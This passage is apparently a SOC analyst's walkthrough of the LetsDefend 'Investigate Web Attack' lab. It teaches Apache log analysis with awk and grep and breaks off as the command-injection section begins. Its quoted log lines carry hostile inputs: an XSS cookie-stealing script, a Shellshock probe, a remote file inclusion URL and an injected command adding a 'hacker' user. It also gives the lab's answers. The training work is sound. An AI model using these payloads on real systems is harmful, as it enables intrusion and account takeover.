SOC Playbook: LetsDefend – Investigate Web Attack

If you are looking for a definitive LetsDefend Investigate Web Attack walkthrough, you are in the right place. As a SOC Analyst working through real-world scenarios, I recently completed the “Detecting Web Attacks” challenge on LetsDefend and built this guide to reflect how a modern SOC investigation should actually be performed.

This is not just about finding the correct answers to complete a lab, but about thinking and operating like a Security Operations Center professional handling a live incident. In a real SOC environment, web attack investigation requires structured triage, log analysis, threat identification, and clear decision-making under pressure. This walkthrough applies those same principles, showing how to analyze attacker behavior, identify patterns, and connect events across logs in a way that mirrors real incident response workflows.


What You Will Learn from This Walkthrough

Throughout this guide, you will see how common web attack techniques are investigated from a SOC perspective, including:

  • Automated Reconnaissance: Spotting bot-driven scans and directory discovery.
  • Brute Force Authentication: Identifying and mitigating credential stuffing or password spraying.
  • Command Injection: Detecting attempts to execute arbitrary commands on the host OS.

The focus is not just on recognizing indicators, but on understanding why they matter and building an analytical mindset that goes beyond tools and signatures toward deeper behavioral analysis.

Whether you are an aspiring SOC Analyst or already working in a SOC role, this guide is designed to strengthen your ability to perform effective web attack investigations using a structured, real-world methodology.


Investigation Scope

In the following sections, I will begin investigating the web server log file access.log from the LetsDefend Investigate Web Attack challenge.

Questions Answered:

  • Q1: Which automated scan tool did the attacker use for web reconnaissance?
  • Q2: After web reconnaissance activity, which technique did the attacker use for directory listing discovery?
  • Q3: What is the third attack type after directory listing discovery?
  • Q4: Is the third attack successful?
  • Q5: What is the name of the fourth attack?
  • Q6: What is the first payload for the fourth attack?
  • Q7: Is there any persistency clue for the victim machine in the log file? If yes, what is the related payload?

Before You Begin — Understanding the Log Format

Every line in an Apache/Nginx combined access log follows this fixed structure:

IP - - [TIMESTAMP] "METHOD ENDPOINT PROTOCOL" STATUS RESPONSE_SIZE "REFERER" "USER-AGENT"

Example:

192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] "GET /bwapp/ HTTP/1.1" 200 4086 "-" "Mozilla/5.00 (Nikto/2.1.6)"
awk PositionFieldExample valueWhat it tells you
$1IP address192.168.199.2Source of the request — who made it
$2Ident-RFC 1413 client identity — almost always -, not used
$3Auth user-Authenticated username — - if no HTTP authentication
$4Date/time[20/Jun/2021:12:36:24Timestamp opening bracket — first half of the request time
$5Timezone+0300]UTC offset — second half of the timestamp, closes the bracket
$6Method"GETHTTP method — GET=reading, POST=submitting data (includes opening ")
$7Endpoint/bwapp/Requested URL path — may contain URL-encoded attack payloads
$8ProtocolHTTP/1.1"HTTP version — confirms protocol in use (includes closing ")
$9Status code200Server response — 200=ok, 302=redirect, 403=forbidden, 404=not found
$10Response Size4086Response size in bytes — - means no body; uniform value = same page served every time
$11Referer"-"URL of the referring page in quotes — - if request was direct
$12+User-Agent"Mozilla/5.00Tool or browser making the request — field count varies when the UA string contains spaces; use awk -F'"' '{print $6}' for reliable extraction regardless of UA length

View 2: The Secure Quote-Delimited Structure (The Enterprise Standard)

To securely extract fragile data like the User-Agent or the URL, SOC analysts use awk -F'"' to slice the log using double-quotes instead of spaces. This shifts the column numbers completely and creates secure “buckets” that never break.

awk -F'”‘ PositionFieldExample valueWhat it securely isolates
$1Pre-Request Block (IP & Time)192.168.199.2 - - [20/Jun/2021:12:36:24 +0300] The IP, Timestamp, and formatting spaces before the first quote.
$2HTTP Request BlockGET /bwapp/ HTTP/1.1The Full HTTP Request: Safely isolates the URL, even if the attacker injected spaces into the path.
$3Response Block (Status & Size) 200 4086 The Status Code and Body Size.
$4Referer-The Referer: Safely trapped inside the second set of quotes.
$5Formatting Space The single blank space between the Referer and the User-Agent.
$6User-AgentMozilla/5.00 (Nikto/2.1.6)The Full User-Agent: Safely captures the entire tool signature, regardless of how many spaces it contains.

Crucial Parsing Concepts: awk vs awk -F'”‘

  • The Default awk Flaw: By default, awk cuts log lines at every space. If an attacker injects spaces into a URL, or if a User-Agent contains spaces (e.g., Mozilla/5.0 (Macintosh...), standard awk shatters the data across the wrong columns.
  • The awk -F'"' Solution: Adding -F'"' forces awk to cut the line only at double-quotes ("). This safely traps volatile data (like the HTTP Request in $2 and the User-Agent in $6) into unbreakable buckets, regardless of how many spaces are inside them.
  • The $5 Formatting Space: Why is $5 just a blank space? Apache logs put a physical space between fields for readability (e.g., "-" "Mozilla..."). When awk cuts at the Referer’s closing quote and the User-Agent’s opening quote, that single formatting space gets trapped all by itself in bucket $5.

⚠️ The Limitation of Quote-Parsing
While -F'"' solves the space injection problem, attackers can still break it by injecting raw double-quotes (") directly into URLs. These injected quotes physically shatter the quote-delimited structure, causing awk to misread the fields. This is why Step 2B uses a structural regex method to detect and isolate these malformed payloads before you begin standard analysis.


PHASE 1 — SITUATIONAL AWARENESS

Know what you have before touching anything


STEP 1 — Establish the log size and incident time window

Why: Before any analysis, you need to understand the scope. Total line count determines how automated the attack was. The timestamp window tells you the total duration of malicious activity. This prevents drawing conclusions from incomplete data.

# Total number of entries in the log
wc -l access.log

# First and last full log lines — shows format and time boundary
head -1 access.log
tail -1 access.log

# Extract timestamps cleanly to see the window
head -1 access.log | awk '{print $4, $5}'
tail -1 access.log | awk '{print $4, $5}'

What to look for:

  • High line counts (5,000+) in a short time window indicate automated tooling
  • Compare first vs last timestamp to determine incident duration
  • The last log line is particularly important — it often contains the final attacker action

This log — confirmed results:

12556 access.log
First entry:  [20/Jun/2021:12:35:40 +0300]  (legitimate user browsing)
Last entry:   [20/Jun/2021:12:53:23 +0300]  (attacker's final injected command)
Total window: 17 minutes 43 seconds

Record: Total lines: _____ | First timestamp: _____ | Last timestamp: _____


STEP 2A — Confirm the log format and field positions

Why: Field positions in awk commands are zero-tolerance. If the log has extra fields or a non-standard format, every subsequent command extracting $6, $7, $9 will produce wrong output. You must verify format before proceeding.

# Visually inspect the first 3 lines
head -3 access.log

# Count fields in a representative line
head -1 access.log | awk '{print NF}'

Expected for Apache Combined Log Format:

  • Field count is typically 9 to 21+ (varies because URLs with spaces produce more fields)
  • Field 4 always starts with [ (timestamp)
  • Field 6 is always the HTTP method inside quotes
  • Field 9 is always the 3-digit HTTP status code

This log — confirmed results:

NF = 21
Format: Apache Combined Log Format — confirmed

STEP 2B — Validate log integrity and isolate malformed payloads

Why: Confirming the format in Step 2A is necessary but not sufficient. Relying on space-counted field positions assumes every line in the log is well-formed — but advanced attackers intentionally inject raw, unencoded double-quotes (") directly into URLs. These injected quotes physically shatter the column structure of the log line, causing standard awk positional commands to silently extract garbage data from the wrong fields. Before trusting any field extraction across the entire log, you must measure the structural health of the file and immediately surface the lines that break the parser. Those broken lines are not noise — they are almost always the most aggressive payloads in the dataset.

Part A — Format compliance check

Establish the exact number of lines that conform to the Apache Combined Log Format structure. This becomes your baseline. Any discrepancy between the total line count and the structural match count is your anomaly count.

# Total baseline line count
wc -l access.log

# Count lines that PERFECTLY match the Apache Combined Log Format structure
grep -Ec '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log

Understanding the structural regex:

This pattern maps the exact physical blueprint of a combined log line. Instead of counting spaces, it anchors to delimiters — brackets and double-quotes — that the attacker cannot remove without breaking the HTTP request itself.

Regex patternFieldHow it works
^[^ ]+IP addressAnchors to line start, reads until the first space
[^ ]+ [^ ]+Ident & auth userSteps over the two - placeholder fields
\[[^]]+\]TimestampCaptures everything enclosed in literal [ and ]
"[^"]*"HTTP request lineCaptures everything inside the first quote pair — an injected space inside the URL cannot break this because the anchor is the closing ", not a space
[0-9]{3}Status codeRequires exactly three consecutive digits
[0-9-]+Body sizeMatches a digit string or a literal - for empty responses
"[^"]*"RefererSteps over the second quoted field
"[^"]*"User-AgentSteps over the final quoted field

How to interpret the comparison:

ScenarioMeaning
Both counts identicalLog is structurally clean — all positional awk commands are safe
grep count slightly lowerAnomaly detected — the gap is the number of malformed lines that failed the structural check
grep returns 0Non-standard format (WAF log, JSON, custom format) — positional awk will fail entirely, dynamic anchoring required

This log — confirmed results:

Total Lines:    12556
Matched Lines:  12457
Discrepancy:    99 malformed lines detected

Part B — Isolate the malformed requests

Once a discrepancy is confirmed, immediately extract the lines that failed the structural check. These lines are invisible to standard positional awk parsers and represent the attacker’s most aggressive payload types.

# Extract every line that breaks the Apache Combined Log Format structure
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log

# Count the malformed lines and compare against the discrepancy from Part A
grep -Ev '^[^ ]+ [^ ]+ [^ ]+ \[[^]]+\] "[^"]*" [0-9]{3} [0-9-]+ "[^"]*" "[^"]*"' access.log | wc -l

Note on the count: The inverted grep returns 100 lines while the arithmetic discrepancy (12556 − 12457) is **99**. The one-line gap is expected — a single line may be structurally ambiguous enough to be counted differently by the two operations. Both numbers are real. The malformed line count is 100; the compliance check delta is 99. Neither indicates an error.

Observed Evidence (sample of malformed lines):

192.168.199.2 ... "GET /bwapp/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> HTTP/1.1" 404 300 ...
192.168.199.2 ... "GET /bwapp/forum.asp?n=/.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver]... HTTP/1.1" 400 326 ...
192.168.199.2 ... "GET /bwapp/index.php?config[\"sipssys\"]=http://cirt.net/rfiinc.txt? HTTP/1.1" 302 - ...
(97 additional malformed lines)

What this means for the rest of the investigation:

These 100 lines exist inside access.log and they are not lost, they simply cannot be parsed by space-delimited awk commands. All subsequent steps in this playbook use grep against the raw log or extract fields by anchoring to structural delimiters (-F'"'), which remain reliable even against these payloads. The positional awk commands ($7, $9, $10) are valid for the 12,456 well-formed lines.


PHASE 2 — IDENTIFY THE ATTACKER

Separate malicious traffic from legitimate traffic


STEP 3 — Extract all unique source IPs with request counts

Why: Volume anomaly is the primary indicator of automated attack traffic. Legitimate browser sessions generate 10–50 requests as they load page assets. Scanners and brute force tools generate hundreds to thousands per minute. This single command separates the attacker from background noise.

# All source IPs with total request count, highest first
awk '{print $1}' access.log | sort | uniq -c | sort -rn

Decision thresholds:

Request CountAssessment
< 100Normal browser session
100 – 1,000Suspicious — possible light scanning
1,000 – 10,000Automated tooling — very likely attacker
> 10,000Confirmed high-volume automation

This log — confirmed results:

12528   192.168.199.2    <-- ATTACKER (99.77% of all 12,556 entries)
   29   192.168.199.1    <-- Legitimate user (browser loading page assets)

Record your attacker IP: 192.168.199.2


STEP 4 — Visually confirm attacker identity by sampling their traffic

Why: High volume is necessary but not sufficient to confirm malicious intent. You must visually inspect a sample to confirm the traffic is anomalous before labeling this IP as the attacker and building all further analysis around that assumption.

# First 20 requests — reveals initial tool and behavior
grep "192.168.199.2" access.log | head -20

# Last 20 requests — reveals final actions and potential persistence
grep "192.168.199.2" access.log | tail -20

# Total count confirmation
grep "192.168.199.2" access.log | wc -l

Signs of malicious automated traffic in the sample:

  • Tool names visible in the User-Agent field (Nikto, Dirb, sqlmap, etc.)
  • Requests to non-existent paths (404 responses) in rapid sequence
  • Random-looking filenames: 4RaXX5Ac.exe, 4RaXX5Ac.conf — these are Nikto’s file extension probe strings
  • Multiple requests at the exact same second — impossible by human typing

This log — confirmed results:

First 20: All Nikto/2.1.6 with test IDs like (Test:Port Check), (Test:map_codes)
          Probing random extensions: .exe, .show, .java, .x-shop, .bat|dir
          Predominantly 404 responses
Last 20:  Brute force login attempts followed by OS command injections
          Final line contains: system('net user hacker Asd123!! /add')
Total:    12528 — confirmed matches

STEP 5 — Isolate all attacker traffic into a dedicated working file

Why: Filtering all subsequent analysis to attacker-only traffic eliminates noise from legitimate users and makes every command faster and cleaner. This is a mandatory step — do not skip it. All remaining steps in this playbook operate on attacker_traffic.log.

# Create the attacker-specific working file
grep "192.168.199.2" access.log > attacker_traffic.log

# Verify line count matches Step 3 and Step 4 counts exactly
wc -l attacker_traffic.log

# Confirm the attacker's own time window
head -1 attacker_traffic.log | awk '{print $4}'
tail -1 attacker_traffic.log | awk '{print $4}'

Validation check: The line count from wc -l attacker_traffic.log must equal the count from grep "192.168.199.2" access.log | wc -l. If they differ, the file creation failed — run the grep command again.

This log — confirmed results:

12528 attacker_traffic.log    (matches — file created correctly)
Attacker window: 12:36:24 → 12:53:23

PHASE 3 — FINGERPRINT THE ATTACK TOOLS

Every tool leaves a User-Agent signature — this phase answers Q1 and Q2


STEP 6 — Extract ALL unique User-Agent strings from attacker traffic

Why: This is the single most critical command in the entire playbook. Every automated attack tool injects a distinctive User-Agent into every request. The number of meaningfully distinct User-Agents equals the number of distinct attack phases. One command hands you the complete attack phase map before you analyze anything else.

Why -F'"' and field $6: The log stores request fields inside double quotes. When awk splits on " as the field delimiter, the resulting fields are: $1=first part, $2=HTTP request line, $3=status/response block, $4=referer value, $5=space, $6=User-Agent value. This $6 position is fixed regardless of URL length or the number of spaces in the URL.

Important — User-Agent strings can be spoofed: User-Agent values are set by the client and can be freely modified by any tool or attacker. They provide a strong initial signal for tool identification, but must never be used as the sole basis for definitive attribution. Always validate User-Agent-based identification through behavioral evidence: request patterns, response codes, endpoint distribution, and request timing. The UA narrows your hypothesis — behavior confirms it.

# Produces the complete global UA landscape including legitimate traffic
awk -F'"' '{print $6}' access.log | sort | uniq -c | sort -nr
# IP + UA correlation with tool variants collapsed — run against the raw log
awk -F'"' '{split($1, a, " "); print a[1], $6}' access.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr

Why both queries are needed: The first gives the full unfiltered inventory — every UA variant visible, no information discarded. The second solves the two limitations of the first: it binds each UA to its source IP, and it collapses Nikto’s per-test variants into a single line with a combined count. Together they answer two distinct questions — what tools exist in the log, and which IP used which tool.

This log — confirmed results from the IP + UA correlation query:

7303   192.168.199.2   Mozilla/5.00 (Nikto/2.1.6)                                       → Nikto (Phase 1)
4816   192.168.199.2   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)               → Dirb  (Phase 2)
 174   192.168.199.2   Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/... Firefox/52.0  → Attacker browser (Phase 3+)
 101   192.168.199.2   -                                                                 → Nikto null-UA evasion
  61   192.168.199.2   () { :; }; echo Nikto-Added-CVE-2014-6271: true;...              → Nikto shellshock probe
  56   192.168.199.2   (empty)                                                           → Nikto empty-UA evasion
  29   192.168.199.1   Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0)...        → Legitimate user
  13   192.168.199.2   ./.\\\                                                            → Nikto path traversal test
   3   192.168.199.2   )</script> HTTP/1.1                                               → Nikto XSS test
   1   192.168.199.2   (log parsing artifact)

What this output tells you before any further analysis:

  • 192.168.199.1 appears once with a legitimate macOS browser UA — confirmed as the benign user
  • 192.168.199.2 accounts for every other line — confirmed as the attacker
  • The attacker used three meaningfully distinct tools: Nikto, Dirb, and their own browser
  • The three tool phases are already visible, counted, and attributed to a single IP in one pass
awk -F'"' '{split($1, a, " "); print a[1], $6}' attacker_traffic.log | sed 's/ (Evasions.*//' | sort | uniq -c | sort -nr
# Focused UA extraction — attacker traffic only, full per-variant detail
awk -F'"' '{print $6}' attacker_traffic.log | sort | uniq -c | sort -rn

Known tool signatures and what they mean:

User-Agent PatternToolPhaseAttack Type
Nikto/2.x.xNiktoPhase 1Web vulnerability scanner (Q1 answer)
MSIE 6.0; Windows NT 5.1DirbPhase 2Directory brute force — Dirb’s known default UA
Mozilla/5.0 (X11; Linux...)Attacker’s own browserPhase 3+Manual exploitation
sqlmap/x.xsqlmapAnySQL injection
python-requests/x.xCustom scriptAnyCustom automation
() { :; }; echo Nikto-Added-CVE-...Nikto shellshock probePhase 1CVE-2014-6271 exploitation attempt

This log — attacker-only UA breakdown (top entries from attacker_traffic.log):

4816   Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)             → Dirb
 234   Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:sitefiles)    → Nikto (one variant of many)
 221   Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:map_codes)    → Nikto
 174   Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/...Firefox/52.0 → Attacker browser
 101   -    (null UA — Nikto requests sent without UA header)
  61   () { :; }; echo Nikto-Added-CVE-2014-6271: true;...            → Nikto shellshock
  56   (empty string — more Nikto evasion variants)
  26   Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:004729)       → Nikto (individual test)
  13   ./.\\\   (Nikto path traversal evasion test)
  (... many more Nikto per-test lines follow)

Three distinct phases identified:

  • Phase 1: Multiple Nikto User-Agent variants (7,303 total when collapsed)
  • Phase 2: MSIE 6.0 / Windows NT 5.1 — Dirb’s known default (4,816 requests)
  • Phase 3+: Firefox/52.0 on Linux — attacker’s own browser, manual exploitation (174 requests)

STEP 7 — Verify and confirm Nikto as the reconnaissance tool — Q1

Why: Nikto explicitly embeds its name in the User-Agent. However, verification through behavior is required to be confident. Confirming that Nikto’s requests follow the expected pattern — probing for CVEs, testing file extensions, checking known dangerous paths — validates the identification beyond just UA matching.

# Total Nikto request volume
grep "Nikto" attacker_traffic.log | wc -l

# Sample of paths Nikto tested
grep "Nikto" attacker_traffic.log | awk '{print $7}' | head -20

# Response code distribution — shows what Nikto found vs what was missing
grep "Nikto" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn

# Nikto phase start and end timestamps
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4}'

Behavioral signatures that confirm Nikto:

  • Test ID annotations in UA: (Test:Port Check), (Test:map_codes), (Test:sitefiles), (Test:002857) — these are Nikto’s internal test catalog references
  • Random 8-character strings with multiple extensions: 4RaXX5Ac.exe, 4RaXX5Ac.conf — Nikto’s extension enumeration probes
  • Shellshock probe in UA field: () { :; }; echo Nikto-Added-CVE-2014-6271 — Nikto’s Bash shellshock test
  • Requests to known vuln paths: /_vti_pvt/, /phpinfo.php, /cgi-bin/, /.htaccess

This log — confirmed results:

7455 total Nikto requests
Start: [20/Jun/2021:12:36:24
End:   [20/Jun/2021:12:36:57    (33 seconds duration)

Why this count (7,455) differs from the 7,303 shown in Step 6:

Step 6’s IP + UA correlation query uses awk -F'"' to extract the User-Agent and sed to group them by the standard Mozilla/5.00 (Nikto/2.1.6) signature. The resulting 7,303 figure is an accurate count of that specific signature, but it undercounts the total Nikto traffic by approximately 152 requests.

This gap is comprised of two distinct Nikto evasion categories:

  1. Structurally Malformed Lines: As identified in Step 2B, the attacker injected raw double-quotes into the URLs (e.g., \"<script>), shattering the log’s column structure. On these lines, the text Nikto lands outside of the $6 User-Agent bucket, rendering them invisible to the positional awk query.
  2. Shellshock Probes (61 lines): These lines were structurally intact and captured perfectly by awk, but Nikto replaces its standard User-Agent header with the exploit payload () { :; }; echo Nikto-Added-CVE-2014-6271: true;.... Because they lack the standard Mozilla prefix, the sed collapse command isolates them into their own bucket of 61 rather than aggregating them into the main 7,303 count.

Command-Line Proof — Isolating the Malformed Lines (The Fast Way):
A healthy Apache Combined Log line contains exactly 6 double-quotes, meaning awk -F'"' will always split it into exactly 7 fields. Any line where the Number of Fields (NF) does not equal 7 has been structurally broken by injected quotes. You can verify the Nikto evasion payloads cleanly with this logic:

# 1. How many malformed lines contain the Nikto signature?
awk -F'"' 'NF!=7' access.log | grep -i "Nikto" | wc -l
# Output: 90

# 2. Show the rest of the malformed lines (Injection tests lacking the Nikto string)
awk -F'"' 'NF!=7' access.log | grep -vi "Nikto"

# 3. Show all 100 malformed lines together
awk -F'"' 'NF!=7' access.log

Q1 ANSWER: nikto


STEP 8 — Verify Dirb as the directory discovery tool — Q2

Why: The MSIE 6.0 / Windows NT 5.1 string is Dirb’s known default User-Agent. No legitimate Internet Explorer 6 traffic has existed on any network since approximately 2008. Its presence in the log is a strong initial indicator for Dirb or similar directory brute-force tools such as Gobuster. Because User-Agent strings are modifiable, tool identity must be confirmed through behavior — not the UA string alone. The combination of high request volume against wordlist-style paths with predominantly 404 responses is the definitive behavioral confirmation.

# Total MSIE 6.0 request volume
grep "MSIE 6.0" attacker_traffic.log | wc -l

# Sample of paths targeted — should show wordlist patterns
grep "MSIE 6.0" attacker_traffic.log | awk '{print $7}' | head -30

# Response code distribution — 404-dominant confirms wordlist scanning
grep "MSIE 6.0" attacker_traffic.log | awk '{print $9}' | sort | uniq -c | sort -rn

# Phase timestamps
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4}'

# Verify the 12-second duration by counting requests per second
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4}' | sort | uniq -c

# View the chronological flow of Dirb requests (Time, Method, Path, Status)
# (Pipe to 'head -30' or 'less' to view the stream comfortably)
grep "MSIE 6.0" attacker_traffic.log | awk '{print $4, $6, $7, $9}' | head -30

Three-condition behavioral confirmation for directory brute-force:

ConditionExpectedInterpretation if true
1. High volume1,000+ requestsAutomated wordlist tool
2. Path varietyCommon directory names, numeric pathsWordlist enumeration
3. 404-dominant80%+ returning 404Probing for things that don’t exist

All three must be true to confirm directory brute-force activity. User-Agent alone is insufficient — behavior seals the determination.

This log — confirmed results:

4816 total MSIE 6.0 requests
Sample paths: /bwapp/admin/2013, /bwapp/admin/2014, /bwapp/admin/21
              /bwapp/administrators  (numeric and alphabetic wordlist mix)
Response codes: Predominantly 404 — tool probing for non-existent paths
Start timestamp: [20/Jun/2021:12:37:50
End timestamp:   [20/Jun/2021:12:38:02

Q2 ANSWER: directory brute force


PHASE 4 — BUILD THE ATTACK TIMELINE

Every phase needs a timestamp boundary — this is the investigation spine


STEP 9 — Establish precise start and end timestamps for every phase

Why: Timestamps are the connective tissue of the entire investigation. Without exact phase boundaries you cannot sequence attacks correctly, calculate gaps, or determine which activity belongs to which phase. The gap between phases reveals attacker decision time — how long they paused to review results before launching the next stage.

# PHASE 1 — Nikto
grep "Nikto" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Nikto" attacker_traffic.log | tail -1 | awk '{print $4, $5}'

# PHASE 2 — Dirb
grep "MSIE 6.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "MSIE 6.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'

# PHASE 3+ — Attacker's own browser (Firefox/52.0)
grep "Firefox/52.0" attacker_traffic.log | head -1 | awk '{print $4, $5}'
grep "Firefox/52.0" attacker_traffic.log | tail -1 | awk '{print $4, $5}'

This log — confirmed timeline:

Phase 1  Nikto    Start: 12:36:24   End: 12:36:57   Duration: 33 seconds
Phase 2  Dirb     Start: 12:37:50   End: 12:38:02   Duration: ~12 seconds
[GAP]                    12:38:02 → 12:41:34        Duration: 3 min 32 sec
Phase 3+ Firefox  Start: 12:41:34   End: 12:53:23   Duration: 11 min 49 sec

Interpreting the 3 min 32 sec gap:
The attacker stopped all automated tooling after Dirb finished and went quiet for over three minutes. This is the attacker manually reviewing Dirb’s output, identifying the login page (/bWAPP/login.php), and setting up their next tool. A gap of this length after enumeration indicates a skilled, methodical operator — not a script running on autopilot.


STEP 10 — Construct the complete timeline table

Fill this in before proceeding. This table is your roadmap for all remaining analysis:

PHASE    TOOL          UA FINGERPRINT            START      END        DURATION
------   -----------   -----------------------   --------   --------   ----------
Phase 1  Nikto         Nikto/2.1.6               12:36:24   12:36:57   33 seconds
Phase 2  Dirb          MSIE 6.0 / Windows NT     12:37:50   12:38:02   ~12 seconds
         [ATTACKER ANALYSIS GAP]                 12:38:02   12:41:34   3.5 minutes
Phase 3  Unknown       Firefox/52.0 Linux        12:41:34   12:49:35   ~8 minutes
Phase 4  Unknown       Firefox/52.0 Linux        12:50:15   12:53:23   ~3 minutes

Phases 3 and 4 share the same User-Agent because they are both manual operations by the attacker using their own browser. They are distinguished by target endpoint and behavior, not by tool change.


PHASE 5 — IDENTIFY THE THIRD ATTACK TYPE

Profile Phase 3 to answer Q3


STEP 11 — Isolate Phase 3 and Phase 4 traffic into a dedicated file

Why: You need a clean, isolated view of the manual phase activity, free from Nikto and Dirb noise. All injection and brute force analysis from this point targets this file.

# Isolate all manual-phase traffic (Firefox/52.0 UA)
grep "Firefox/52.0" attacker_traffic.log > phase3_traffic.log

# Confirm line count
wc -l phase3_traffic.log

# View complete Phase 3+ activity in chronological order
awk '{print $4, $6, $7, $9, $10}' phase3_traffic.log

This log — confirmed results:

174 lines in phase3_traffic.log

STEP 12 — Identify HTTP methods used in the manual phase

Why: HTTP method is the highest-signal behavioral indicator at this stage. Switching from the GET-dominant scanning of Phases 1 and 2 to heavy POST activity on a specific endpoint is a direct indicator of credential-based attack. The method ratio shapes your initial hypothesis.

# Method distribution for the entire manual phase
awk '{print $6}' phase3_traffic.log | sort | uniq -c

Interpretation framework:

Method PatternLikely Attack Type
GET-dominant with varied endpointsBrowsing or manual recon
POST-dominant against one endpointBrute force or form injection
GET with long URL parametersCode/command injection via URL
Mixed POST heavy early, GET with params lateBrute force then post-login injection

This log — confirmed results:

 39   "GET     (browsing: page loading, asset requests, navigation)
135   "POST    (dominant — data submission to server)

135 POST requests vs 39 GET requests. The dominant action is submitting data. This rules out passive recon and points directly toward active exploitation.


STEP 13 — Map all endpoints targeted in the manual phase

Why: Endpoint concentration is the definitive differentiator between attack types. A brute force attack drills one single endpoint repeatedly. A scanner distributes requests across hundreds of different paths. The distribution shape identifies the attack type.

# All method + endpoint combinations with counts, sorted by volume
awk '{print $6, $7}' phase3_traffic.log | sort | uniq -c | sort -rn

Reading the distribution:

ConcentrationAttack Type
Single endpoint > 70% of trafficBrute force — intense repetition on one target
Hundreds of paths mostly 404Directory/file brute force
One endpoint, varying parametersParameter injection
Spread across many authenticated pagesPost-login manual exploration

This log — confirmed results:

134   "POST /bWAPP/login.php       ← 77% of ALL 174 Phase 3 requests — one endpoint
  2   "GET /bWAPP/portal.php
  2   "GET /bWAPP/phpi.php?message=test
  2   "GET ...phpi.php?message=...(encoded commands)
  1   "POST /bWAPP/portal.php
  (remaining 33: image/CSS/JS assets loaded when navigating the portal)

134 of 174 requests — 77% — concentrated on a single endpoint. This is the unmistakable shape of brute force.


STEP 14 — Confirm the brute force pattern through response code and body size analysis

Why: The server’s HTTP responses are ground truth. For login brute force the pattern is specific and inescapable: hundreds of identical failure responses followed by one success response with a completely different code and body. The body size column is the clearest evidence because it proves every one of those 132 responses was the same login-failure page.

# Response code distribution for all login POST requests
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9}' | sort | uniq -c

# Response CODE + BODY SIZE together — the definitive brute force fingerprint
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $9, $10}' | sort | uniq -c

# Total login attempt count
grep "POST /bWAPP/login.php" attacker_traffic.log | wc -l

# Timing of attempts — proves automation (human cannot type at this speed)
grep "POST /bWAPP/login.php" attacker_traffic.log | awk '{print $4}' | head -15

HTTP response reference for login pages:

CodeBodyMeaning
200Uniform size repeatedFailed login — same page returned every time
302- (no body)Successful login — server redirected to authenticated area
403PresentIP or account blocked
429PresentRate limit triggered

This log — confirmed results:

132   200  4086     ← 132 failed logins: identical login-failure page (4086 bytes) every time
  2   302  -        ← 2 successful logins: redirect with no body = credentials found

Total: 134 attempts

Timing sample:
12:44:xx → 12:45:xx → 12:46:xx (regular ~4-5 second intervals = automated tool)

The 4086 pattern explained: The number 4086 is the exact byte size of the login-failure HTML page. When login fails, the server renders the same form with the same error message — same HTML, same size, every time. The fact that this number appears 132 times with zero variation mathematically proves every one of those attempts received an identical failed-login response.

Q3 ANSWER: Brute force


PHASE 6 — CONFIRM WHETHER THE BRUTE FORCE SUCCEEDED

Answer Q4


STEP 15 — Isolate successful authentication events

Why: Whether the attack succeeded changes everything about the incident response. A failed attack requires detection tuning. A successful one requires active containment. The HTTP 302 redirect on a login endpoint is the server’s way of saying “credentials accepted, go here now.”

# Isolate ONLY the successful login redirects
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 "

# Count how many successful logins occurred
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | wc -l

# Exact timestamp of first successful login
grep "POST /bWAPP/login.php" attacker_traffic.log | grep " 302 " | head -1 | awk '{print $4, $5}'

This log — confirmed results:

192.168.199.2 - - [20/Jun/2021:12:49:35 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0
192.168.199.2 - - [20/Jun/2021:12:50:10 +0300] "POST /bWAPP/login.php HTTP/1.1" 302 - ... Firefox/52.0

2 successful logins
First breach timestamp: 12:49:35

STEP 16 — Confirm authenticated access was established (post-login navigation)

Why: A 302 on a login page is strong evidence of success, but you must also verify the attacker reached and loaded the authenticated area. If portal.php returned HTTP 200 with a full body, the attacker is definitively inside the application.

# What did the attacker load immediately after the 302 redirect?
grep "Firefox/52.0" attacker_traffic.log | grep -A5 "POST /bWAPP/login.php.*302"

# Did the attacker reach the authenticated portal?
grep "Firefox/52.0" attacker_traffic.log | grep "portal.php"

This log — confirmed results:

12:49:35  POST /bWAPP/login.php  302  -       (success — redirect issued)
12:50:10  POST /bWAPP/login.php  302  -       (second successful login)
12:50:10  GET  /bWAPP/portal.php 200  23369   (authenticated portal loaded — 23,369 bytes)
12:50:15  POST /bWAPP/portal.php 302  23369   (navigating within authenticated area)
12:50:15  GET  /bWAPP/phpi.php   200  12735   (selected vulnerable page from portal menu)

The portal returned HTTP 200 with 23,369 bytes — a full page load, not an error or redirect. The attacker is inside.

Q4 ANSWER: Yes


PHASE 7 — IDENTIFY THE FOURTH ATTACK

Profile post-login exploitation to answer Q5 and Q6


STEP 17 — Map all post-login activity

Why: After gaining access the attacker’s behavior changes completely. They stop repeating the same request and start navigating. What they navigate to, and what parameters they pass, reveals both the fourth attack type and the specific exploitation technique.

# Full chronological view of all activity after the successful login
